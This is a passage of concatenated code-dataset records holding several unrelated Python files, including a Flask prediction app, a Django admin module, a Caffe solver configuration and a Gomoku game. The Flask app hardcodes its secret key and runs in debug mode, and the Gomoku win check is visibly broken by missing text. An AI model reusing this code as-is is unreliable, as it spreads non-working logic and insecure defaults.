'wall/horiz')\n\nwall_and_door('interior', 'axe')\nwall_and_door('brick', 'pickaxe')\nwall_and_door('wood', 'axe', ('window/v0',))\nwall_and_door('stone', 'pickaxe', ('window/v0', 'window/v1',))\nwall_and_door('cottage', 'axe',\n ('variant/v0', 'variant/v1', 'variant/v2', 'window/v0', 
'window/v1',))\nwall_and_door('iron', 'pickaxe')\n\n# ruined_wall doesn't have a proper door, so we can't use wall_and_door\nautorotate.register_wall('ruined_wall')\nmallet.register('ruined_wall/',\n ('edge/horiz', 'window/v0', 'window/v1',) + mallet.WALL_VARIANTS)\nstructure_items.register('ruined_door', 'ruined_wall/door/open', 'pickaxe')\n","sub_path":"scripts/outpost/structure_items.py","file_name":"structure_items.py","file_ext":"py","file_size_in_byte":3863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"222694020","text":"# -*- coding: utf-8 -*-\r\nfrom __future__ import print_function\r\nimport caffe\r\nfrom caffe import layers as L\r\nfrom caffe import params as P\r\nfrom google.protobuf import text_format\r\nimport os\r\nimport sys\r\nimport math\r\nfrom HandPoseData import *\r\nfrom HandPoseNet import *\r\nsys.dont_write_bytecode = True\r\n##################################################################################\r\ncaffe_root = \"/home/zhangming/work/remodet_repository\"\r\n# --------------------------------Model Info--------------------------------------\r\nProject = \"HandPoseNet\"\r\nBaseNet = \"ResNet\"\r\nModels = \"96input_B128ConvInitLr0\"\r\nVer = \"1A\"\r\nSpecs = \"\"\"\r\nTest.\r\n\"\"\"\r\nPretrained_Model = \"/home/zhangming/Models/PretainedModels/ResNetPoseDet_V1-B48_C1S-C2S_MultiScale_A6iter300000_Conv1.caffemodel\"\r\n#Pretrained_Model = \"/home/ethan/Models/Results/HandPoseNet/ResNet_96input_1A/Models/ResNet_96input_1A_iter_40000.caffemodel\"\r\nResults_dir = \"/home/zhangming/Models/Results\"\r\n# -----------------------------config for computation----------------------------\r\ngpus = \"1\"\r\nresume_training = False\r\ntest_initialization = True\r\nsnapshot_after_train = True\r\nremove_old_models = False\r\n# --------------------------------solver Param-----------------------------------\r\nupdate_batchsize = 1*train_batchsize\r\ntrain_max_itersize = 500000\r\nbase_lr = 5e-4\r\nweight_decay = 0.0005\r\nlr_policy = \"step\"\r\nstepsize = 40000\r\n# stepvalue = [100000,200000,300000]\r\nstepvalue = [200000,350000,500000]\r\ngamma = 0.1\r\nmomentum = 0.9\r\nsnapshot = 10000\r\naverage_loss = 20\r\ndisplay = 20\r\nsolve_type = \"Adam\" # Adam / SGD\r\ndebug = False\r\ntest_interval = 1000\r\neval_type = \"handpose\"\r\nrandom_seed = 150\r\ntest_compute_loss = True\r\n# ################################################################################\r\n# --------------------------------DO NOT MODIFIED--------------------------------\r\n# get gpus\r\ndef get_gpus():\r\n return gpus\r\n# get num of gpus\r\ndef get_gpunums():\r\n return len(get_gpus().split(','))\r\n# get update iters\r\ndef get_update_iter():\r\n return int(math.ceil(float(update_batchsize) / (train_batchsize * get_gpunums())))\r\n# get solver mode of caffe\r\ndef get_solver_mode():\r\n if get_gpunums() > 0:\r\n return P.Solver.GPU\r\n else:\r\n return P.Solver.CPU\r\n# get device id of root solver\r\ndef get_device_id():\r\n if get_gpunums() > 0:\r\n return int(get_gpus().split(',')[0])\r\n else:\r\n return -1\r\ndef get_test_iter_for_project():\r\n return [get_test_iter()]\r\n# --------------------------------Source Params-----------------------------------\r\n# get solver param\r\ndef get_solver_param():\r\n return {\r\n # learning rate and update hyper-params\r\n 'base_lr': base_lr,\r\n 'weight_decay': weight_decay,\r\n 'lr_policy': lr_policy,\r\n 'stepsize': stepsize,\r\n 'stepvalue':stepvalue,\r\n 'gamma': gamma,\r\n 'momentum': momentum,\r\n 'iter_size': get_update_iter(),\r\n 'max_iter': train_max_itersize,\r\n 'snapshot': snapshot,\r\n 'display': display,\r\n 'average_loss': average_loss,\r\n 'type': solve_type,\r\n 'solver_mode': get_solver_mode(),\r\n 'device_id': get_device_id(),\r\n 'debug_info': debug,\r\n 'snapshot_after_train': snapshot_after_train,\r\n # Test parameters\r\n 'test_interval': test_interval,\r\n 'test_iter':get_test_iter_for_project(),\r\n 'test_net_type': [eval_type,],\r\n 'test_initialization': test_initialization,\r\n 'test_compute_loss': 
test_compute_loss,\r\n 'random_seed' : random_seed,\r\n }\r\n","sub_path":"remodet_repository_wdh_part/Projects/HandPose/solverParam.py","file_name":"solverParam.py","file_ext":"py","file_size_in_byte":3564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"532392208","text":"from project.demoHasCycleUF import writeResults\nimport project.GraphGenerator as GraphGenerator\nimport graph.Graph_AdjacencyList\nimport graph.Graph_IncidenceList\nimport graph.Graph_AdjacencyMatrix\n\n\n@writeResults\ndef hasCycleDFSTest(G):\n \"\"\"\n Esegue una visita DFS nel grafo G a partire dal primo nodo. Mantiene bool di marcatura per ogni nodo\n tramite indicizzazione diretta su una lista, verifica se ci sono archi all'indietro, ovvero da un nodo\n ad uno già visitato che non ne sia il padre. Se non ci sono archi all'indietro il grafo è aciclico.\n :param G: Graph.\n :return: bool.\n \"\"\"\n rootId = list(G.nodes.keys())[0]\n visited = [False for _ in G.nodes] # inizializza la lista di marcatura\n return hasCycleDFSRecursive(G, rootId, visited, rootId) # inizia la visita vera e propria\n\n\ndef hasCycleDFSRecursive(G, v, visited, fatherId):\n visited[v] = True # marca il nodo v come visitato\n for adjNode in G.getAdj(v):\n if not visited[adjNode]:\n if hasCycleDFSRecursive(G, adjNode, visited, v): # se la chiamata ricorsiva individua un ciclo\n return True # ritorna True\n elif adjNode != fatherId:\n return True\n\n return False\n\n\ndef repeatedTest(graphImpl, maxN, steps):\n # per semplicita' si assuma maxN % steps = 0\n assert graphImpl in range(3)\n file = open(\"hasCycleDFSTest.txt\", \"a\")\n\n delta = int(maxN / steps)\n\n if graphImpl == 0:\n file.write(\"AdjacencyList:\\n\")\n elif graphImpl == 1:\n file.write(\"IncidenceList:\\n\")\n else:\n file.write(\"AdjacencyMatrix:\\n\")\n\n file.close()\n\n temp = delta\n while temp <= maxN:\n if graphImpl == 0:\n G = graph.Graph_AdjacencyList.GraphAdjacencyList()\n elif graphImpl == 1:\n G = graph.Graph_IncidenceList.GraphIncidenceList()\n else:\n G = graph.Graph_AdjacencyMatrix.GraphAdjacencyMatrix()\n GraphGenerator.generateRandGraph(G, temp)\n\n hasCycleDFSTest(G)\n temp += delta\n\n print(\"Done!\")\n\n\nif __name__ == \"__main__\":\n for i in range(3):\n repeatedTest(i, 5000, 10)\n","sub_path":"project/demoHasCycleDFS.py","file_name":"demoHasCycleDFS.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"127421565","text":"#!/usr/bin/env python3\nimport cv2\nimport math\nimport numpy as np\nfrom keras import backend as k\nfrom keras.models import model_from_json\n\n# init variables\njson_model_path = \"./model/model_struct.json\"\nweights_path = \"./model/model_weights.h5\"\ntarget_size = (200, 200)\nalpha = 0.7\nbeta = 0.5\nv_max = 10\nv_old = 0\nsa_old = 0\n\ncap = cv2.VideoCapture(0)\n\n# Set keras to test phase\nk.set_learning_phase(0)\n\n# Load json and weights, then compile model\nwith open(json_model_path, 'r') as json_file:\n loaded_model_json = json_file.read()\nmodel = model_from_json(loaded_model_json)\nmodel.load_weights(weights_path)\nmodel.compile(loss='mse', optimizer='sgd')\n\nwhile True:\n ret, frame = cap.read()\n img = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n img = cv2.resize(img, target_size)\n img = np.asarray(img, dtype=np.float32) * np.float32(1.0/255.0)\n\n carry = np.array(img)[np.newaxis, :, :, np.newaxis]\n\n outs = model.predict(carry, batch_size=None, verbose=0, steps=None)\n theta, p_t = outs[0][0], outs[1][0]\n\n velocity = (1 - alpha) * v_old + alpha * (1 - p_t) * v_max\n steering_angle = (1 - beta) * sa_old + beta * math.pi / 2 * theta\n sa_deg = steering_angle / math.pi * 180\n\n v_old = velocity\n sa_old = steering_angle\n\n out = {'Velocity\\t ==> \\t': velocity, 'Steering Angle\\t ==> \\t': sa_deg}\n for name, val in out.items():\n # prnt = \"{0} ==> {1:3.4f}\"\n # print(print.format(name, float(val)))\n print(name + \"%3.4f\" % float(val))\n\n cv2.imshow('frame', img)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"misc/test_dronet_with_webcam.py","file_name":"test_dronet_with_webcam.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"331543458","text":"from flask import Flask, render_template, flash, url_for, redirect\r\nfrom flask_sqlalchemy import SQLAlchemy\r\nfrom forms import PredictionForm\r\nimport pickle\r\n\r\n\r\napp = Flask(__name__)\r\napp.config['SECRET_KEY'] = '19416c21be3d611b5d01b37409a55fe9'\r\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///prediction.db'\r\ndb = SQLAlchemy(app)\r\n\r\n\r\nclass Flower(db.Model):\r\n id = db.Column(db.Integer, primary_key=True)\r\n sl = db.Column(db.Float())\r\n sw = db.Column(db.Float())\r\n pl = db.Column(db.Float())\r\n pw = db.Column(db.Float())\r\n\r\n def __repr__(self):\r\n return f\"Flower('{self.sl}','{self.sw}','{self.pl}','{self.pw}')\"\r\n # return f\"User('{self.username}', '{self.email}', '{self.image_file}')\"\r\n\r\n\r\n@app.route('/')\r\n@app.route('/home')\r\ndef home():\r\n return render_template('home.html')\r\n\r\n\r\n@app.route('/data', methods=['GET', 'POST'])\r\ndef data():\r\n form = PredictionForm()\r\n if form.validate_on_submit():\r\n flower = Flower(sl=form.sl.data, sw=form.sw.data, pl=form.pl.data, pw=form.pw.data)\r\n db.session.add(flower)\r\n db.session.commit()\r\n return redirect(url_for('predict'))\r\n return render_template('data.html', form=form)\r\n\r\n\r\n@app.route('/predict', methods=['GET', 'POST'])\r\ndef predict():\r\n # flower = Flower.query.all()[-1]\r\n # return render_template('predict.html')\r\n flower = Flower.query.all()[-1]\r\n test_data = [[flower.sl, flower.sw, flower.pl, flower.pw]]\r\n model = pickle.load(open('model.pkl', 'rb'))\r\n prediction = model.predict(test_data)\r\n output = prediction[0]\r\n return render_template('predict.html', value=output)\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(port = 5001, debug=True)\r\n","sub_path":"ML_Projects/flask/Iris/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"260515891","text":"from click.testing import CliRunner\nfrom evernote_to_sqlite.cli import cli\nimport sqlite_utils\nimport pathlib\n\nexample_enex = pathlib.Path(__file__).parent / \"example-note.enex\"\n\n\ndef test_version():\n runner = CliRunner()\n with runner.isolated_filesystem():\n result = runner.invoke(cli, [\"--version\"])\n assert 0 == result.exit_code\n assert result.output.startswith(\"cli, version \")\n\n\ndef test_enex(tmpdir):\n output = str(tmpdir / \"output.db\")\n result = CliRunner().invoke(\n cli, [\"enex\", output, str(example_enex)], catch_exceptions=False\n )\n assert 0 == result.exit_code\n db = sqlite_utils.Database(output)\n assert set(db.table_names()) == {\n \"notes\",\n \"resources\",\n \"resources_data\",\n \"note_resources\",\n \"notes_fts_idx\",\n \"notes_fts\",\n \"notes_fts_config\",\n \"notes_fts_docsize\",\n \"notes_fts_data\",\n \"resources_fts_config\",\n \"resources_fts\",\n \"resources_fts_idx\",\n \"resources_fts_data\",\n \"resources_fts_docsize\",\n }\n assert list(db[\"notes\"].rows) == [\n {\n \"id\": \"8e2d6cef463bf974fe15c145d02dcfb90e4dc2af\",\n \"title\": \"Example note with images\",\n \"content\": 'This note includes two images.
The Python logo
The Evernote logo
This image contains text:
',\n \"created\": \"2020-10-11T21:28:22\",\n \"updated\": \"2020-10-11T23:30:38\",\n \"latitude\": \"37.77742571705006\",\n \"longitude\": \"-122.4256495114116\",\n \"altitude\": \"23.16121864318848\",\n \"author\": \"Simon Willison\",\n \"source\": \"desktop.mac\",\n \"reminder-order\": \"0\",\n }\n ]\n\n assert list(db[\"resources\"].rows) == [\n {\n \"md5\": \"61098c2c541de7f0a907c301dd6542da\",\n \"mime\": \"image/svg+xml\",\n \"width\": \"0\",\n \"height\": \"0\",\n \"duration\": \"0\",\n \"timestamp\": \"19700101T000000Z\",\n \"ocr\": None,\n \"reco-type\": None,\n \"file-name\": None,\n },\n {\n \"md5\": \"91bd26175acac0b2ffdb6efac199f8ca\",\n \"mime\": \"image/svg+xml\",\n \"width\": \"0\",\n \"height\": \"0\",\n \"duration\": \"0\",\n \"timestamp\": \"19700101T000000Z\",\n \"ocr\": None,\n \"reco-type\": None,\n \"file-name\": None,\n },\n {\n \"md5\": \"76dd28b07797cc9f3f129c4871c5293c\",\n \"mime\": \"image/png\",\n \"width\": \"670\",\n \"height\": \"128\",\n \"duration\": \"0\",\n \"timestamp\": \"19700101T000000Z\",\n \"ocr\": \"This is so can test the OCR\",\n \"reco-type\": \"unknown\",\n \"file-name\": \"Untitled-1.png\",\n },\n ]\n resource_md5s = [rd[\"md5\"] for rd in db[\"resources_data\"].rows]\n assert resource_md5s == [\n \"61098c2c541de7f0a907c301dd6542da\",\n \"91bd26175acac0b2ffdb6efac199f8ca\",\n \"76dd28b07797cc9f3f129c4871c5293c\",\n ]\n assert list(db[\"note_resources\"].rows) == [\n {\n \"note_id\": \"8e2d6cef463bf974fe15c145d02dcfb90e4dc2af\",\n \"resource_id\": \"61098c2c541de7f0a907c301dd6542da\",\n },\n {\n \"note_id\": \"8e2d6cef463bf974fe15c145d02dcfb90e4dc2af\",\n \"resource_id\": \"91bd26175acac0b2ffdb6efac199f8ca\",\n },\n {\n \"note_id\": \"8e2d6cef463bf974fe15c145d02dcfb90e4dc2af\",\n \"resource_id\": \"76dd28b07797cc9f3f129c4871c5293c\",\n },\n ]\n # Check we enabled Porter stemming\n assert \"tokenize='porter'\" in db[\"notes_fts\"].schema\n","sub_path":"tests/test_evernote_to_sqlite.py","file_name":"test_evernote_to_sqlite.py","file_ext":"py","file_size_in_byte":4158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"567436666","text":"from django.contrib import admin\n\nfrom import_export.admin import ImportExportModelAdmin\n\nfrom .models import (Producer,\n ProductGroup,\n Attribute,\n Article,\n ArticleImage,\n PaymentItem,\n PaymentOrder,\n PaymentOrderCommentHistory,\n ArticleGroup)\n\nfrom .forms import (ProducerForm,\n ProductGroupForm,\n AttributeForm,\n ArticleForm,\n ArticleImageForm,\n PaymentItemForm,\n PaymentOrderForm,\n PaymentOrderCommentHistoryForm,\n ArticleGroupForm)\n\n\nclass ProducerAdmin(ImportExportModelAdmin):\n form = ProducerForm\n list_display = ('id', 'producer_name', 'link',\n 'profile_image', 'description')\n fieldsets = (\n (\"General info\", {'fields': ('producer_name',\n 'link', 'profile_image', 'description')}),\n )\n add_fieldsets = (\n (None, {\n 'classes': ('wide',),\n 'fields': ('producer_name', 'link', 'profile_image', 'description'),\n }),\n )\n search_fields = ('id', 'producer_name', 'link',\n 'profile_image', 'description',)\n ordering = ('id', 'producer_name', 'link', 'profile_image', 'description',)\n\n\nclass AttributeAdmin(ImportExportModelAdmin):\n form = AttributeForm\n list_display = ('id', 'article_id', 'feature_id', 'value')\n fieldsets = (\n (\"General info\", {'fields': ('article_id', 'feature_id', 'value',)}),\n )\n add_fieldsets = (\n (None, {\n 'classes': ('wide',),\n 'fields': ('article_id', 'feature_id', 'value',),\n }),\n )\n search_fields = ('id', 'article_id__article_name',\n 'feature_id__feature_name',)\n ordering = ('id', 'article_id__article_name',\n 'feature_id__feature_name', 'value',)\n\n\nclass ArticleAdmin(ImportExportModelAdmin):\n form = ArticleForm\n list_display = ('id', 'article_code', 'article_name', 'sub_category_id', 'producer_id',\n 'product_group_id', 'description', 'price', 'unit_of_measure', 'currency', 'is_available')\n list_filter = ('is_available',)\n fieldsets = (\n (\"General info\", {'fields': ('article_code', 'article_name', 'sub_category_id', 'producer_id',\n 'product_group_id', 'description', 'price', 'unit_of_measure', 'currency', 'is_available')}),\n )\n add_fieldsets = (\n (None, {\n 'classes': ('wide',),\n 'fields': ('article_code', 'article_name', 'sub_category_id', 'producer_id', 'product_group_id', 'description', 'price', 'unit_of_measure', 'currency', 'is_available'),\n }),\n )\n search_fields = ('id', 'article_code', 'article_name', 'sub_category_id__sub_category_name',\n 'producer_id__producer_name', 'product_group_id__group_name', 'description', 'unit_of_measure',)\n ordering = ('id', 'article_code', 'article_name', 'sub_category_id__sub_category_name', 'producer_id__producer_name',\n 'product_group_id__group_name', 'description', 'price', 'unit_of_measure', 'currency', 'is_available',)\n\n\nclass ArticleImageAdmin(admin.ModelAdmin):\n form = ArticleImageForm\n list_display = ('id', 'article_id', 'image', 'image_name',\n 'purpose', 'content_type', 'size', 'height', 'width')\n fieldsets = (\n (\"General info\", {'fields': ('article_id',\n 'image', 'image_name', 'purpose',)}),\n )\n add_fieldsets = (\n (None, {\n 'classes': ('wide',),\n 'fields': ('article_id', 'image', 'image_name', 'purpose',),\n }),\n )\n search_fields = ('id', 'article_id__article_name', 'image',\n 'image_name', 'purpose', 'content_type',)\n ordering = ('id', 'article_id__article_name', 'image', 'image_name',\n 'purpose', 'content_type', 'size', 'height', 'width',)\n\n\nclass ProductGroupFormAdmin(ImportExportModelAdmin):\n form = ProductGroupForm\n list_display = ('id', 'group_name')\n fieldsets = (\n (\"General info\", 
{'fields': ('group_name',)}),\n )\n add_fieldsets = (\n (None, {\n 'classes': ('wide',),\n 'fields': ('group_name',),\n }),\n )\n search_fields = ('id', 'group_name',)\n ordering = ('id', 'group_name',)\n\n\nclass PaymentItemAdmin(admin.ModelAdmin):\n form = PaymentItemForm\n readonly_fields = ('user_discount', 'article_price')\n list_display = ('id', 'article_id', 'payment_order_id',\n 'amount', 'user_discount', 'article_price', 'article_attributes',)\n fieldsets = (\n (\"General info\", {'fields': ('article_id', 'payment_order_id',\n 'number_of_pieces', 'user_discount', 'article_price', 'article_attributes',)}),\n )\n add_fieldsets = (\n (None, {\n 'classes': ('wide',),\n 'fields': ('article_id', 'payment_order_id', 'number_of_pieces', 'user_discount', 'article_price', 'article_attributes',),\n }),\n )\n search_fields = ('id', 'article_id__article_name',\n 'payment_order_id__email__email',)\n ordering = ('id', 'article_id__article_name',\n 'payment_order_id__email', 'user_discount', 'article_price',)\n\n\nclass PaymentOrderAdmin(admin.ModelAdmin):\n form = PaymentOrderForm\n readonly_fields = ('time_created','time_modified', 'total_cost')\n list_display = ('id', 'full_name', 'address', 'zip_code', 'city', 'phone',\n 'method_of_payment', 'total_cost', 'status', 'time_created')\n list_filter = ('status',)\n fieldsets = (\n (\"General info\", {'fields': ('email', 'address', 'zip_code',\n 'city', 'phone', 'method_of_payment', 'status', 'total_cost','time_created','time_modified',)}),\n )\n add_fieldsets = (\n (None, {\n 'classes': ('wide',),\n 'fields': ('email', 'address', 'zip_code', 'city', 'phone', 'method_of_payment', 'status',),\n }),\n )\n search_fields = ('id', 'email__email', 'address', 'zip_code',\n 'city', 'method_of_payment', 'status',)\n ordering = ('id', 'email__email', 'address', 'zip_code', 'city', 'method_of_payment', 'status', 'total_cost', 'time_created',)\n\nclass PaymentOrderCommentHistoryAdmin(admin.ModelAdmin):\n form = PaymentOrderCommentHistoryForm\n readonly_fields = ('time_created', 'status',)\n \n list_display = ('payment_order_id', 'created_by', 'comment', 'status', 'time_created',)\n list_filter = ('status',)\n\n fieldsets = (\n (\"General info\", {\n 'fields': (\n 'payment_order_id', 'comment', 'status', 'time_created',\n )\n }),\n )\n \n add_fieldsets = (\n (None, {\n 'classes': ('wide',),\n 'fields': (\n 'payment_order_id', 'comment',\n ),\n }),\n )\n search_fields = ('payment_order_id', 'status', 'created_by',)\n ordering = ('payment_order_id', 'comment', 'status', 'time_created', 'created_by',)\n\n def get_form(self, request, *args, **kwargs):\n form = super(PaymentOrderCommentHistoryAdmin, self).get_form(request, *args, **kwargs)\n form.current_user = request.user\n return form\n\n\nclass ArticleGroupAdmin(admin.ModelAdmin):\n form = ArticleGroupForm\n list_display = ('id', 'group_name','show_articles', 'description', 'link')\n fieldsets = (\n (\"General info\", {\n 'fields': ('group_name', 'article_ids', 'description', 'link',)}),\n )\n add_fieldsets = (\n (None, {\n 'classes': ('wide',),\n 'fields': ('group_name', 'article_ids', 'description', 'link',),\n }),\n )\n search_fields = ('id', 'group_name', 'article_ids', 'description','link',)\n ordering = ('id', 'group_name', 'article_ids', 'description', 'link',)\n\n def show_articles(self, obj):\n return \" / \".join([a.article_name for a in obj.article_ids.all()])\n\n\nadmin.site.register(Producer, ProducerAdmin)\nadmin.site.register(ProductGroup, ProductGroupFormAdmin)\nadmin.site.register(Attribute, 
AttributeAdmin)\nadmin.site.register(Article, ArticleAdmin)\nadmin.site.register(ArticleImage, ArticleImageAdmin)\nadmin.site.register(PaymentItem, PaymentItemAdmin)\nadmin.site.register(PaymentOrder, PaymentOrderAdmin)\nadmin.site.register(ArticleGroup, ArticleGroupAdmin)\nadmin.site.register(PaymentOrderCommentHistory, PaymentOrderCommentHistoryAdmin)\n","sub_path":"product/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":8700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"331608213","text":"N, M = 9,9\na_row = 5\nn_players = 2\nmarks = ['B', 'W']\ngrid = [['.' for x in range(N)] for y in range(M)]\n\n# This function prints the grid of Gomoku as the game progresses\ndef print_grid():\n for i in range(n_players):\n print('Player %d: %c ' % (i + 1, marks[i]), end='')\n if i < n_players - 1:\n print('vs ', end='')\n print()\n print('--' + '---' * M + '--')\n for i in range(N):\n print(end='| ')\n for j in range(M):\n print(grid[i][j], end=' ')\n print(end='|')\n print()\n print('--' + '---' * M + '--')\n\n\n# This function checks if the game has a win state or not\ndef check_win(i,j,mark):\n for i in range(N):\n count1 = count2 = count3 = 0\n for j in range(N):\n if grid[i][j] == mark:\n count1 += 1\n if count1 == 5:\n return True\n\n if grid[j][i] == mark:\n count3 += 1\n if count3 == 5:\n return True\n\n\n co1 = 0\n v = j ; k = i # dig right\n\n while j <= v = 5:\n return True\n\n\n co2 = 0 # dig left\n a = j ; y = i\n\n\n while a < N and -1 < y :\n if grid[y][a] == mark:\n co2 += 1\n else:\n break\n a += 1\n y -= 1\n vc = j - 1\n vb = i + 1\n while -1 < vc and vb < M:\n if grid[vb][vc] == mark:\n co2 += 1\n else :\n break\n vc -= 1\n vb += 1\n if co2 >= 5:\n return True\n\n return False\n\n# This function checks if the game has a tie state or not for the given mark\ndef check_tie_player(mark):\n for i in range(N):\n count1 = 0\n for j in range(M):\n if grid[i][j] == mark or grid[i][j] == '.': # row\n count1 += 1\n if count1 == 5:\n return False\n else:\n break\n\n for j in range(M):\n count2 = 0\n for i in range(N):\n if grid[i][j] == mark or grid[i][j] == '.': # column\n count2 += 1\n if count2 == 5:\n return False\n else:\n break\n\n for i in range(N // 2):\n for j in range(M):\n i += 1\n count3 = 0\n if grid[i][j] == mark or grid[i][j] == '.': # d right\n count3 += 1\n if count3 == 5:\n return False\n else:\n break\n\n for j in range(M//2+1):\n for i in range(N):\n j+=1\n count3=0\n if grid[i][j] == mark or grid[i][j] == '.' :\n count3 += 1\n if count3 == 5:\n return False\n else:\n break\n\n for j in range(M // 2, M):\n for i in range(N):\n j -= 1\n count3 = 0\n if grid[i][j] == mark or grid[i][j] == '.': # d left\n count3 += 1\n if count3 == 5:\n return False\n else:\n break\n\n for i in range(N // 2):\n for j in range(M-1,0,-1):\n i+=1\n count3 = 0\n if grid[i][j] == mark or grid[i][j] == '.': # d right\n count3 += 1\n if count3 == 5:\n return False\n else:\n break\n return True\n\n# This function checks if the game has a tie state or not\ndef check_tie():\n n_players=2\n all_tie = True\n for i in range(n_players):\n if not check_tie_player(marks[i]):\n all_tie = False\n return all_tie\n \"\"\"for i in range(N):\n for j in range(M):\n if grid[i][j] == '.':\n return False\n return True\"\"\"\n\n\n# This function checks if given cell is empty or not\ndef check_empty(i, j):\n empty = grid[i][j] == '.'\n return empty\n\n\n# This function checks if given position is valid or not\ndef check_valid_position(i, j):\n valid = (0<=i < N and 0<=j < M)\n return valid\n\n\n# This function sets the given mark to the given cell\ndef set_cell(i, j, mark):\n grid[i][j] = mark\n\n\n# This function clears the game structures\ndef grid_clear():\n global grid\n grid = [['.' 
for x in range(N)] for y in range(M)]\n\n\n# This function reads a valid position input\ndef read_input():\n i, j = map(int, input('Enter the row index and column index: ').split())\n while not check_valid_position(i, j) or not check_empty(i, j):\n i, j = map(int, input('Enter a valid row index and a valid column index: ').split())\n return i, j\n\n\n# MAIN FUNCTION\ndef play_game():\n print(\"Gomoku Game!\")\n print(\"Welcome...\")\n print(\"============================\")\n player = 0\n while True:\n # Prints the grid\n print_grid()\n # Read an input position from the player\n print('Player %s is playing now' % marks[player])\n i, j = read_input()\n # Set the player mark in the input position\n set_cell(i, j, marks[player])\n # Check if the grid has a win state\n if check_win(i,j,marks[player]):\n # Prints the grid\n print_grid()\n # Announcement of the final statement\n print('Congrats, Player %s is won!' % marks[player])\n break\n # Check if the grid has a tie state\n if check_tie():\n # Prints the grid\n print_grid()\n # Announcement of the final statement\n print(\"Woah! That's a tie!\")\n break\n # Player number changes after each turn\n player = (player + 1) % n_players\n\n\nwhile True:\n grid_clear()\n play_game()\n c = input('Play Again [Y/N] ')\n if c not in 'yY':\n break\n","sub_path":"gomoko.py","file_name":"gomoko.py","file_ext":"py","file_size_in_byte":6232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
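check_win above scans rows, columns and the two diagonals with hand-rolled loops. An equivalent, more compact formulation walks outward from the last move along four direction vectors (a standalone sketch, not part of the program):

    def check_win_directions(grid, i, j, mark):
        n, m = len(grid), len(grid[0])
        for di, dj in ((0, 1), (1, 0), (1, 1), (1, -1)):  # row, column, both diagonals
            count = 1  # the stone just placed at (i, j)
            for sign in (1, -1):  # walk away from (i, j) in both directions
                r, c = i + sign * di, j + sign * dj
                while 0 <= r < n and 0 <= c < m and grid[r][c] == mark:
                    count += 1
                    r += sign * di
                    c += sign * dj
            if count >= 5:
                return True
        return False

    g = [['.'] * 9 for _ in range(9)]
    for col in range(4, 9):
        g[2][col] = 'B'
    print(check_win_directions(g, 2, 6, 'B'))  # True: five in a row on row 2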
+{"seq_id":"21081326","text":"\"\"\" predict_args.py\nPart 2 of Udacity AIPND final project submission for Marco Besier.\npredict_args.py contains the command line argument definitions for predict.py\n\"\"\"\n\nimport argparse\n\ndef get_args():\n \"\"\"\n Get argument parser for predict command line.\n \n Command line argument examples:\n - Print top K classes along with associated probabilities: python predict.py path_to_image --top_k 5\n - Load a JSON file that maps the class values to other category names: python predict.py path_to_image --category_names cat_to_name.json\n - Use GPU to calculate predictions: python predict.py path_to_image --gpu\n \n For argparse examples see https://pymotw.com/3/argparse\n Returns an argparse parser.\n \"\"\"\n \n parser = argparse.ArgumentParser(\n description=\"Image prediction.\",\n usage=\"python ./predict.py /path/to/image.jpg checkpoint.pth\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter\n )\n \n parser.add_argument(\"path_to_image\",\n help=\"Path to image file.\",\n action=\"store\"\n ) \n \n parser.add_argument(\"checkpoint_file\",\n help=\"Path to checkpoint file.\",\n action=\"store\"\n )\n \n parser.add_argument(\"--save_dir\",\n action=\"store\",\n default=\".\",\n dest=\"save_dir\",\n type=str,\n help=\"Directory to save training checkpoint file.\"\n )\n \n parser.add_argument(\"--top_k\",\n action=\"store\",\n default=5,\n dest=\"top_k\",\n type=int,\n help=\"Return top K most likely classes.\"\n )\n \n parser.add_argument(\"--category_names\",\n action=\"store\",\n default=\"cat_to_name.json\",\n dest=\"categories_json\",\n type=str,\n help=\"Path to file containing the categories.\"\n )\n \n parser.add_argument(\"--gpu\",\n action=\"store_true\",\n dest=\"use_gpu\",\n default=False,\n help=\"Use GPU.\"\n )\n \n parser.parse_args()\n return parser\n\n\ndef main():\n \"\"\"\n Main Function\n \"\"\"\n print(f'Command line argument utility for predict.py\\nTry \"python predict.py -h\".')\n \nif __name__ == \"__main__\":\n main()\n\"\"\"\nmain() is called if script is executed on it's own.\n\"\"\"","sub_path":"predict_args.py","file_name":"predict_args.py","file_ext":"py","file_size_in_byte":2694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
